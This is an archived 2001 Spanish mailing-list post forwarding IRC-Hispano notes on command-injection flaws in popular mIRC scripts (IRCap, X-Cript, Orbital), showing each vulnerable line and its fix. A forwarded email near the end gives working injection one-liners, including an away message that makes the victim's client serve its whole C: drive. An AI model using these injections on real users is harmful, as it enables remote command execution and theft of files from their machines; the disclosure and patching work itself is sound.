[HACK] [Fwd: [admins] Nota de prensa IRC-Hispano]

Jesus Cea Avion jcea at argo.es
Tue Sep 4 21:39:09 CEST 2001


> Luego el tema cayó en el olvido... y hasta hoy.
> 
> Si me encuentro con ánimos, un día de estos, a ver si encuentro las
> redacciones originales y las mando a la lista. Creo que tienen valor,
> aunque sea histórico.

Bien, aquí teneis los detalles truculentos :-). No son míos, sino que
fueron detectados, comprobados y validados por multitud de gente en
IRC-Hispano.

Mensaje del 26 de marzo de 2001:

>>>>>
hola:
Estos son los errores mas comunes que se han detectado.


     - IRCap: Este bug solamente se puede utilizar cuando la persona que
usa el IRCap tiene el simulador de lag (eso que
retrasa la respuesta del ping x segundos). Explico donde está el fallo:
#simulag off
ctcp 1!:PING: if %simulag < 1 { set %simulag 1 } | .timer 1 %simulag
.ctcpreply $nick $1- | echo 12 -se $timestamp PING de 
$nick [retrasando respuesta %simulag segs] | meflod | halt
#simulag end
 
El problema está aquí .timer 1 %simulag .ctcpreply $nick $1- <- FALLO
que te ejecuta toda la línea... es decir, si ejecutas un 
comando de esta manera: 
//.raw privmsg nick_de_la_persona :PING $ctime $chr(124) comando $+ ,
podemos tener acceso total sobre la máquina del 
IRCapero en este caso.
 
Para que no te pase eso tenemos varias opciones, bajar la actualización
de la web (recomendado/www.ircap.net), quitar el 
simulador de lag o cambiar simplemente esto:
 
LINEA PELIGROSA: .timer 1 %simulag .ctcpreply $nick $1-
LINEA NO PELIGROSA: .timer 1 %simulag .ctcpreply $nick $1
 
Solamente cambiar el $1- (toda la frase) por $1 (solamente la primera
palabra), con lo cual ya no tendremos ninguna posibilidad 
de ser atacados.
 
 
                - X-Cript, MeSiAs, Xilindre y derivados: El bug más
conocido y más usado por la gente ya que es el más facil de usar y 
se puede usar sobre TODOS los X-cript. El fallo, este:
 
raw 301:*: .timer 1 1 echo -es 12Away (6 $+ $2 $+ 2) 4:2 (14 $3- 2) |
halt
 
El problema es aquí esto exactamente .timer 1 1 echo -es 12Away (6 $+ $2
$+ 2) 4:2 (14 $3- 2) <- fallo que al hacer whois 
ejecute todo comando que tenga en el away.
Con un simple //away hola $chr(124) comando , podemos tener control
total sobre la máquina del usuario del X-cript, MeSiAs y el 
Xilindre y otros sucedaneos.
 
Para solucionarlo, se puede bajar el parche de su web
(www.relativo.com), hacer /whois test en el iRC-Hispano (recomendado) o 
simplemente cambiar esa linea por esta:
 
LINEA PELIGROSA: .timer 1 1 echo -es 12Away (6 $+ $2 $+ 2) 4:2 (14 $3-
2)
LINEA NO PELIGROSA: echo $gettok(%whois.per,9,44) 12Away (6 $+
$remove($2,1,$chr(124)) $+ 2) 4:2 (14 
$remove($3-,1,$chr(124)) 2)
 
La linea cambiada está sacada directamente de la actualización del
X-cript, lo que hace es simplemente no llevar ningun timer y 
elimina todo lo que haya a partir de $chr(124) hacia detrás para que no
haya peligro.
 
 
         - Antiguas versiones del Orbital: Este script ya no se
actualiza, porque su creador está en el proyecto de hacer un cliente 
de iRC. El bug consiste en un evento mal puesto y puede servir para
corregir bugs de otros scripts menos utilizados que tengan el 
mismo evento. Solo es una cosa así:
 
ON ^*:TOPIC:#: { .timer 1 2 echo $chan [TOPIC] $1- }
 
La linea no tiene porque ser esa exactamente (no dispongo del codigo del
Orbital, versiones anteriores) pero es de ese tipo. ¿Qué 
hace eso? Simplemente que tu pongas un topic de esta manera: hola |
.amsg hola soy tonto , el infectado con ese bug, hará el 
comando detrás de | (que es el $chr(124)).
 
La manera de arreglarlo es facil, simplemente quita el timer y que quede
asi:
 
LINEA PELIGROSA: ON ^*:TOPIC:#: { .timer 1 2 echo $chan [TOPIC] $1- }
LINEA NO PELIGROSA: ON ^*:TOPIC:#: { .echo $chan [TOPIC] $1- }
 
Repito, solamente hay que quitar el timer, que a mi parecer es
totalmente innecesario :)
 
-
Concluyendo, estos son los bugs de los scripts más usados del
IRC-Hispano, o al menos, los hasta ahora conocidos.
Leyenda: $chr(124) es el caracter que nosotros vemos como |
              timer un comando del mIRC que sirve para ejecutar un
comando x veces               cada x tiempo.
 
<<<<<






Ejemplos de exploits.
Email recibido el 22 de Marzo de 2.001

>>>>>
hola:
ejemplo del Xcript

//away jiji $chr(124) fserve (tu nick) 99 c:\ 
Substituye (tu nick) por tu nick y te enviara un fserve para ke veas
todo su disco y vajes el fichero ke mas te guste. 


ejemplo del ircap

 IRCap: Este bug se da solo en el caso de que el sujeto a "atacar" tenga
el simulador de lag activado, eso de que al hacer un ping te responde
burradas como 2horas o 
2semanas... Si no tienen activado eso, no funciona. El comando para
ejecutarlo es simplemente esto:
//.raw privmsg $1 :PING $ctime $chr(124) comando $+ 

<<<<<

-- 
Jesus Cea Avion                         _/_/      _/_/_/        _/_/_/
jcea at argo.es http://www.argo.es/~jcea/ _/_/    _/_/  _/_/    _/_/  _/_/
                                      _/_/    _/_/          _/_/_/_/_/
PGP Key Available at KeyServ   _/_/  _/_/    _/_/          _/_/  _/_/
"Things are not so easy"      _/_/  _/_/    _/_/  _/_/    _/_/  _/_/
"My name is Dump, Core Dump"   _/_/_/        _/_/_/      _/_/  _/_/
"El amor es poner tu felicidad en la felicidad de otro" - Leibniz



More information about the hacking mailing list